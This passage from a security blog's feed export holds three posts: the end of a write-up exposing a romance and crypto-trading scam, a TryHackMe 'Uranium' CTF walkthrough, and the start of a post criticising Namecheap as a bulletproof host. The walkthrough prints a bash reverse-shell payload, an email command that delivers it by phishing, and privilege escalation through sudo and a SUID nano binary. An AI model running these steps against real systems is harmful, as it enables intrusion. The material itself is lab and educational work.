,https://blog.syncpundit.io/media/posts/7/responsive/instagram-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/instagram-2xl.png 1600w\"></p>\n<p><span style=\"font-weight: 400;\">They would then bait their victims by following and liking their pictures and/or matching with them. As soon as the victim responds, they immediately pivot the conversation to WhatsApp, likely because WhatsApp does not have reliable support for reporting accounts, which matters for the inevitable fallout when the victim catches on to the scam.</span></p>\n<p><span style=\"font-weight: 400;\">On WhatsApp they start texting a lot, giving the victims attention and enticing them with photos. Over the course of the next few days, the scammer tries to discover whether or not the victim has a sizable income/savings while subtly using the images and conversation to suggest that the fictional character they’re impersonating is living a lavish lifestyle. They send pictures of themselves eating fancy meals, shopping for expensive bags and pictures of their luxury villas and apartments.</span></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/food.png\" alt=\"fake restaurant pic \" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/food-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/food-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/food-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/food-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/food-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/food-2xl.png 1600w\"></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/white-mention.png\" alt=\"fake white mansion\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/white-mention-xs.png 300w 
,https://blog.syncpundit.io/media/posts/7/responsive/white-mention-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/white-mention-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/white-mention-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/white-mention-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/white-mention-2xl.png 1600w\"></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/mension-green.png\" alt=\"fake mansion \" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/mension-green-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/mension-green-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/mension-green-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/mension-green-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/mension-green-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/mension-green-2xl.png 1600w\"></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/bath.png\" alt=\"Fake mansion bathroom\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/bath-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/bath-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/bath-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/bath-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/bath-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/bath-2xl.png 1600w\"></p>\n<p><span style=\"font-weight: 400;\">Next after winning over the trust of the victim, the scammer reveals the secret to how they make their money - they know someone who’s an expert in cryptocurrency trading. 
They used a few stories:</span></p>\n<ol>\n<li><span style=\"font-weight: 400;\">Their professor at school built a sophisticated algorithm that gives reliable trading signals; he likes her, so he gives her daily signals.</span></li>\n<li><span style=\"font-weight: 400;\">An intelligent family member (mother, father, sibling or cousin) is studying in the United States, is good at trading, and gives weekly and daily market forecasts.</span></li>\n<li><span style=\"font-weight: 400;\">She has a friend who’s a “bigtime broker” with dozens of employees monitoring the markets 24/7.</span></li>\n</ol>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/MetaTrader-last-2.png\" alt=\"Fake MT ticker trade\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/MetaTrader-last-2-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/MetaTrader-last-2-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/MetaTrader-last-2-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/MetaTrader-last-2-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/MetaTrader-last-2-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/MetaTrader-last-2-2xl.png 1600w\"></p>\n<p><span style=\"font-weight: 400;\">Naturally, they offer to help the victim trade, using tips from their third-party expert trader. They help them download and set up MetaTrader and get them to fund their portfolio with anything between $200USD and $500USD. They then give the victim good trading signals and help them turn some decent profits. 
They keep this going for a few days, encouraging the victim to increase the money they’ve invested each day.</span></p>\n<p><span style=\"font-weight: 400;\">For victims that are interested in crypto investing, they would have them download Binance and take them through the same process, often helping them make some decent profits over the course of a few days. This process proves to be highly effective in getting the victims eager to start making “serious money”. </span></p>\n<p><span style=\"font-weight: 400;\">After gaining the victim’s trust, they encourage the victim to go all in. The story is that the expert forecasted that the following week the market will be bullish and it would be a great opportunity to make a fortune. They have the victim gather all their savings and have them ready for next week’s market. It’s at this point that they introduce “an even better platform with lower rates” - LCryptos, the phishing website. </span></p>\n<p><span style=\"font-weight: 400;\">The victim registers an account on LCryptos and deposits their savings into the scammers’ address; the money is gone before the victim even notices. The platform shows fake graphs and terminals of the victim’s investment turning profits. When the victim tries to withdraw their profits they are sent a warning preventing the withdrawal. These warnings vary but they follow a similar structure: the account has been flagged for some form of misconduct, usually money laundering, and the victim has to prove they are the rightful owner of the account by depositing at least 50% of the amount they are trying to withdraw.</span></p>\n<p><span style=\"font-weight: 400;\">One victim reported that they sent the required 50% but from a different account and was directed to deposit again, but from the same account they had used to make the initial deposit. 
They followed the instructions but, like all the other victims, the platform’s support kept finding different reasons why the identity verification was failing and kept asking for more deposits to settle the account.</span></p>\n<p><span style=\"font-weight: 400;\">Some victims caught on to the scam quickly and some, unfortunately, kept depositing more money until they had drained all their funds; some even took out loans. When the victims confronted the “Asian woman” she denied any foul play and went on to show that her own withdrawals had gone through, insisting that the victims should just follow the instructions and everything would work out.</span></p>\n<h2><span style=\"font-weight: 400;\">Detection</span></h2>\n<p><span style=\"font-weight: 400;\">I attempted to open lcryptos[.]com and its subdomains but they were not resolving, yet the victims were able to visit the site. This suggests that the website only resolves when the host has a specific referrer. This was later confirmed by one of the victims I found on Twitter.</span></p>\n<p><span style=\"font-weight: 400;\">Obfuscation methods like these make it especially difficult to detect these kinds of attacks. Another reason for the difficulty in detecting them is the embarrassment the victims feel because of the nature of the circumstances, which hinders them from coming forward.</span></p>\n<p><span style=\"font-weight: 400;\">If you’ve been affected by this or a similar scam, please reach out to me. Even if I can’t recover your funds, I can work towards shutting down the scam and making sure that the public is aware of the techniques scammers are using, hopefully helping people protect themselves in the future.</span></p>",
"image": "https://blog.syncpundit.io/media/posts/8/MetaTrader-last.png",
"author": {
"name": "Sync_Pundit"
},
"tags": [
"Threat Intelligence",
"Research"
],
"date_published": "2022-08-23T00:44:00+02:00",
"date_modified": "2023-03-12T13:21:14+02:00"
},
{
"id": "https://blog.syncpundit.io/uranium-ctf-walkthrough/",
"url": "https://blog.syncpundit.io/uranium-ctf-walkthrough/",
"title": "Tryhackme: Uranium CTF Walkthrough",
"summary": "I loved this room! We get our foothold through phishing one of Uranium's employees. We found an account of one the employees: hakanbey…",
"content_html": "<address>I loved this <span style=\"color: #3598db;\"><a href=\"https://tryhackme.com/room/uranium/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">room</a></span>! We get our foothold through phishing one of Uranium's employees. We found an account of one the employees: <span style=\"color: #3598db;\"><a href=\"https://twitter.com/hakanbe40520689\" target=\"_blank\" rel=\"noopener\" style=\"color: #3598db;\">hakanbey </a></span></address><address> </address>\n<h2>RECONNAISSANCE</h2>\n<p>From his twitter account we get a few interesting things.</p>\n<p>1. We have Uranium's domain, <span style=\"color: #3598db;\">uranium.thm</span>:</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-domain.png\" alt=\"uranium domain\" width=\"601\" height=\"220\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-domain-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-domain-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-domain-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-domain-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-domain-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-domain-2xl.png 1600w\"></figure>\n<p>2. 
We can infer his email address is <a href=\"mailto:hakanbey@uranium.thm:\"><span style=\"color: #3598db;\">hakanbey@uranium.thm</span>:</a></p>\n<figure class=\"post__image\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-username.png\" alt=\"uranium email\" width=\"604\" height=\"438\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-username-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-username-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-username-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-username-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-username-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-username-2xl.png 1600w\"></figure>\n<p>3. He opens his mail from the terminal if the file is an application (<span style=\"color: #3598db;\">filename: \"application\"</span>)</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-file-policy.png\" alt=\"uranium filename policy\" width=\"605\" height=\"179\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-file-policy-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-file-policy-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-file-policy-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-file-policy-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-file-policy-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-file-policy-2xl.png 1600w\"></figure>\n<p> </p>\n<p>From a basic nmap scan we found a few open ports: 22, 25 and 80 which are standard ssh, smtp and HTTP ports respectively.</p>\n<figure class=\"post__image post__image--center\"><img 
loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-nmap-recon.png\" alt=\"uranium nmap scan\" width=\"1487\" height=\"433\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-nmap-recon-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nmap-recon-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nmap-recon-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nmap-recon-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nmap-recon-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nmap-recon-2xl.png 1600w\"></figure>\n<p> </p>\n<h2>INITIAL ACCESS</h2>\n<p>From the intel we have, a phishing attack is clearly the ripe vector. We're going to send him an \"application\" 😈 for him to review.</p>\n<blockquote>\n<p>┌──(ihawu㉿lesizwe)-[~/Documents/tryhackme/a]<br>└─$ cat application <br>#!/bin/bash<br><br>bash -c 'exec bash -i &>/dev/tcp/10.13.20.58/4444 <&1'</p>\n</blockquote>\n<p>We'll send hakanbey our payload using a command line based smtp email delivery program, sendEmail, and start a netcat listener of course :)</p>\n<blockquote>\n<p>sendEmail -t hakanbey@uranium.thm -f example@gmail.com -s 10.13.20.58 -u \"Uranium Coin Wallet Beta\" -m \"Here's the beta for the wallet\" -o tls=no -a application</p>\n</blockquote>\n<p>Wait for it...... 
wait for it....</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-initial-access-2.png\" alt=\"uranium initial access\" width=\"974\" height=\"128\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-initial-access-2-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-initial-access-2-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-initial-access-2-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-initial-access-2-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-initial-access-2-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-initial-access-2-2xl.png 1600w\"></figure>\n<p>And we get the first user flag in the home directory.</p>\n<pre><code>hakanbey@uranium:~$ ls\nchat_with_kral4 mail_file user_1.txt\nhakanbey@uranium:~$ cat user_1.txt\nthm<span style=\"color: #3598db;\">{--REDACTED--}</span>\nhakanbey@uranium:~$ \n</code></pre>\n<h2>PRIVILEGE ESCALATION</h2>\n<p>In the home folder we can see a binary named <span style=\"color: #3598db;\">chat_with_kral4</span>; let's find out what it is.</p>\n<pre><code>hakanbey@uranium:~$ ls\nchat_with_kral4 mail_file user_1.txt\nhakanbey@uranium:~$ \n\nhakanbey@uranium:~$ ./chat_with_kral4\nPASSWORD :\n</code></pre>\n<p>The app needs a password. Let's stash it for now and look around the system. One of my go-to directories is /var/log/. 
</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-pcap-log.png\" alt=\"uranium pcap file\" width=\"1352\" height=\"213\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-pcap-log-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-pcap-log-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-pcap-log-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-pcap-log-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-pcap-log-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-pcap-log-2xl.png 1600w\"> </figure>\n<p><span style=\"color: #3598db;\">hakanbey_network_log.pcap</span> is definitely worth looking into. Let's download and look into it.</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-get-the-pcap.png\" alt=\"uranium pcap file\" width=\"803\" height=\"384\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-get-the-pcap-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-get-the-pcap-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-get-the-pcap-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-get-the-pcap-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-get-the-pcap-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-get-the-pcap-2xl.png 1600w\"></figure>\n<p>We open it with wireshark and follow the tcp stream and, wait for it......</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-tcp-stream.png\" alt=\"uranium tcp stream\" width=\"626\" height=\"403\" sizes=\"(max-width: 48em) 
100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-tcp-stream-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-tcp-stream-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-tcp-stream-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-tcp-stream-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-tcp-stream-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-tcp-stream-2xl.png 1600w\"></figure>\n<p>That weird string before the chats is likely the password to the <span style=\"color: #3598db;\">chat_with_kral4 </span>app we found. Let's try it and see. </p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-user-pass.png\" alt=\"uranium chat with kral4\" width=\"813\" height=\"565\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-user-pass-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-user-pass-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-user-pass-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-user-pass-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-user-pass-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-user-pass-2xl.png 1600w\"></figure>\n<p>We got hakanbey's password 🎊. 
Now let's see what exactly we can do with hakanbey's password.</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-sudo-perm.png\" alt=\"uranium sudo -l\" width=\"1361\" height=\"167\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-sudo-perm-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-sudo-perm-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-sudo-perm-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-sudo-perm-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-sudo-perm-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-sudo-perm-2xl.png 1600w\"></figure>\n<p>As hakanbey we can run /bin/bash with sudo, but only as kral4. So we need to escalate to kral4. Let's run</p>\n<blockquote>\n<p>sudo -u kral4 /bin/bash</p>\n</blockquote>\n<pre><code>hakanbey@uranium:~$ sudo -u kral4 /bin/bash \nkral4@uranium:~$ \n</code></pre>\n<p>We get the second user flag in kral4's home directory. Let's snoop around kral4's account. 
</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-SUID-search.png\" alt=\"uranium suid search\" width=\"784\" height=\"583\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-SUID-search-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-SUID-search-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-SUID-search-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-SUID-search-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-SUID-search-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-SUID-search-2xl.png 1600w\"></figure>\n<p>There are some pretty interesting SUID tools we could use to escalate to root. Let's go check out /var again.</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-mail.png\" alt=\"uranium /var/mail\" width=\"1636\" height=\"682\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-mail-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-mail-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-mail-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-mail-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-mail-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-mail-2xl.png 1600w\"></figure>\n<p>This time around we got something interesting from /var/mail. Something just popped into my head: there's a web flag we need to get. The web flag is likely in /var/www/html but we don't have read access to it. Remember we can use /bin/dd? 
<span style=\"color: #3598db;\"><a href=\"https://gtfobins.github.io/gtfobins/dd/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Gtfobins</a></span> says:</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-dd.png\" alt=\"uranium dd command\" width=\"931\" height=\"639\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-dd-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-dd-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-dd-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-dd-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-dd-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-dd-2xl.png 1600w\"></figure>\n<p>Let's use this to read the web flag.</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-web-flag.png\" alt=\"uranium web flag\" width=\"815\" height=\"125\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-web-flag-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-web-flag-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-web-flag-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-web-flag-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-web-flag-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-web-flag-2xl.png 1600w\"></figure>\n<p>Awesome!!! Let's get back to the mail we found. 
We understand a few things from the email:</p>\n<ol>\n<li>'index.html' has been attacked before</li>\n<li>Kral4 should keep the nano binary in his home directory in case index.html is attacked again</li>\n<li>The nano binary will be given SUID next time index.html is attacked <span style=\"color: #3598db;\">as long as it's in the home directory</span></li>\n</ol>\n<p>Knowing this, we need to copy the nano binary into kral4's home directory and attack the index.html file.</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-nano.png\" alt=\"uranium nano\" width=\"608\" height=\"145\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-2xl.png 1600w\"></figure>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-new-mail.png\" alt=\"uranium new mail\" width=\"1072\" height=\"148\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-new-mail-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-new-mail-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-new-mail-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-new-mail-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-new-mail-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-new-mail-2xl.png 1600w\"></figure>\n<p>Kral4 has new mail, let's see what 
that's about.</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-nano-got-SUID.png\" alt=\"uranium nano got suid\" width=\"1224\" height=\"245\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-2xl.png 1600w\"></figure>\n<p>AWESOME!!!! </p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-nano-got-SUID-now.png\" alt=\"uranium nano has suid\" width=\"468\" height=\"103\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-now-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-now-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-now-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-now-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-now-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-nano-got-SUID-now-2xl.png 1600w\"></figure>\n<p>Now that nano has SUID, let's add hakanbey to the sudoers file.</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/6/uranium-root.png\" alt=\"uranium root access\" width=\"489\" height=\"208\" sizes=\"(max-width: 48em) 100vw, 768px\" 
srcset=\"https://blog.syncpundit.io/media/posts/6/responsive/uranium-root-xs.png 300w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-root-sm.png 480w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-root-md.png 768w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-root-lg.png 1024w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-root-xl.png 1360w ,https://blog.syncpundit.io/media/posts/6/responsive/uranium-root-2xl.png 1600w\"></figure>\n<p>And we have root!!!!!!!!!!🪅🎊🎉🎈🎈🎈</p>\n<p>That was fun! Happy hacking!!</p>",
"image": "https://blog.syncpundit.io/media/posts/6/uranium-logo-3.jpeg",
"author": {
"name": "Sync_Pundit"
},
"tags": [
"Walkthroughs",
"Phishing"
],
"date_published": "2021-09-20T20:45:32+02:00",
"date_modified": "2021-09-22T23:00:50+02:00"
},
{
"id": "https://blog.syncpundit.io/namecheap-home-to-phishing-sites/",
"url": "https://blog.syncpundit.io/namecheap-home-to-phishing-sites/",
"title": "NAMECHEAP: HOME TO PHISHING SITES",
"summary": "It's no secret that Namecheap has become a bulletproof host, and it's not news at this point. Thousands of people have written blogs,…",
"content_html": "<p>It's no secret that Namecheap has become a bulletproof host, and it's not news at this point. Thousands of people have written blogs, tweets and made videos about it, here's another one!</p>\n<p> </p>\n<h2>BULLETPROOF HOSTS</h2>\n<p>Hosting, as we know it, is what powers the internet. A hosting provider is a company that leases some computing power to costumers to use - usually for serving websites like this awesome blog 😏. This leased computing power is not limited to awesome blogs. They host mail servers, dns servers, databases, web apps, malware and phishing sites.... </p>\n<p>That is where bulletproof hosts come in. Most hosting providers have strict policies in that govern what can be hosted on their servers, bulletproof hosts do not. They choose to turn a blind eye to whatever is hosted on their servers and typically do not have much, if any, policies on what can and cannot be hosted on their servers. Naturally they are popular with cyber criminals. They host malware, botnet command and control centers, black market websites, phishing websites, etc.</p>\n<p>On a high level, a bulletproof host has these properties:</p>\n<ul>\n<li>Loose policies</li>\n<li>Evade responsibility</li>\n<li>Difficult to impossible report procedure</li>\n<li>Slow to no response to reports</li>\n</ul>\n<h2> </h2>\n<h2>NAMECHEAP'S KEVLAR</h2>\n<p>Namecheap is both a registrar and hosting provider. A registrar is a company that registers domain names. Usually these companies also sell these domains, so much so that it's become \"standard\" that whomever you buy your domains from will register them as well. Since the registrar is in charge of the domain name, it naturally follows that the hosting provider will hold more weight in having phishing sites taken down - since they are the ones hosting the actual phishing content.</p>\n<p>This is Namecheap's first line of defense to evade responsibility. 
<span style=\"color: #3598db;\"><a href=\"https://www.icann.org/resources/pages/approved-with-specs-2013-09-17-en\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">ICANN clearly states that</a></span>:</p>\n<p><strong><em>3.18.1 Registrar shall maintain an abuse contact to receive reports of abuse involving Registered Names sponsored by Registrar, including reports of Illegal Activity. Registrar shall publish an email address to receive such reports on the home page of Registrar's website (or in another standardized place that may be designated by <abbr title=\"Internet Corporation for Assigned Names and Numbers\">ICANN</abbr> from time to time). Registrar shall take reasonable and prompt steps to investigate and respond appropriately to any reports of abuse.</em></strong></p>\n<p><span style=\"color: #3598db;\"><a href=\"https://www.icann.org/resources/pages/what-2012-02-25-en\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">ICANN</a></span> is a not-for-profit partnership of people from all over the world dedicated to keeping the Internet secure, stable and inter-operable. </p>\n<p><strong><em>To reach another person on the Internet you have to type an address into your computer - a name or a number. That address has to be unique so computers know where to find each other. <abbr title=\"Internet Corporation for Assigned Names and Numbers\">ICANN</abbr> coordinates these unique identifiers across the world. Without that coordination we wouldn't have one global Internet.</em></strong></p>\n<p>Back to Namecheap. The guys that govern THE 